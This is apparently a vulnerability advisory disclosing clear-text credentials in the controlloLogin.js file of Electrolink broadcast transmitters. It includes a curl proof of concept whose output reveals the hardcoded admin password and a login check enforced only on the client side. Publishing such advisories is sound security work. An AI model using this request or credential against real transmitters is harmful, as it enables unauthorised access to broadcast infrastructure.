Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credential Disclosure

`  
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure  
  
  
Vendor: Electrolink s.r.l.  
Product web page: https://www.electrolink.com  
Affected version: 10W, 100W, 250W, Compact DAB Transmitter  
500W, 1kW, 2kW Medium DAB Transmitter  
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter  
100W, 500W, 1kW, 2kW Compact FM Transmitter  
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter  
15W - 40kW Digital FM Transmitter  
BI, BIII VHF TV Transmitter  
10W - 5kW UHF TV Transmitter  
Web version: 01.09, 01.08, 01.07  
Display version: 1.4, 1.2  
Control unit version: 01.06, 01.04, 01.03  
Firmware version: 2.1  
  
Summary: Since 1990 Electrolink has been dealing with design and  
manufacturing of advanced technologies for radio and television  
broadcasting. The most comprehensive products range includes: FM  
Transmitters, DAB Transmitters, TV Transmitters for analogue and  
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,  
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial  
switches, Manual patch panels, RF power meters, Rigid line and  
accessories. A professional solution that meets broadcasters needs  
from small community television or radio to big government networks.  
  
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"  
touch-screen display and in-built state of the art DAB modulator,  
EDI input and GPS receiver. All transmitters are equipped with a  
state-of-the art DAB modulator with excellent performances,  
self-protected and self-controlled amplifiers ensure trouble-free  
non-stop operation.  
  
100W, 500W, 1kW and 2kW power range available on compact 2U and  
3U 19" frame. Built-in stereo coder, touch screen display and  
efficient low noise air cooling system. Available models: 3kW,  
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters  
with fully broadband solid state amplifiers and an efficient  
low-noise air cooling system.  
  
FM digital modulator with excellent specifications, built-in  
stereo and RDS coder. Digital deviation limiter together with  
ASI and SDI inputs are available. These transmitters are ready  
for ISOFREQUENCY networks.  
  
Available for VHF BI and VHF BIII operation with robust desing  
and user-friendly local and remote control. Multi-standard UHF  
TV transmitters from 10W up to 5kW with efficient low noise air  
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC  
and ISDB-Tb available.  
  
Desc: The device is vulnerable to a disclosure of clear-text  
credentials in controlloLogin.js that can allow security  
bypass and system access.  
  
Tested on: Mbedthis-Appweb/12.5.0  
Mbedthis-Appweb/12.0.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research & Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
  
  
Advisory ID: ZSL-2023-5790  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php  
  
  
30.06.2023  
  
--  
  
  
C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"  
function verifica() {  
var user = document.getElementById('user').value;  
var password = document.getElementById('password').value;  
  
//alert(user);  
  
if(user=='admin' && password=='cozzir'){  
SetCookie('Login','OK',exp);  
window.location.replace("FrameSetCore.html");  
}else{  
SetCookie('Login','NO',exp);  
window.location.replace("login.html");  
}  
}  
`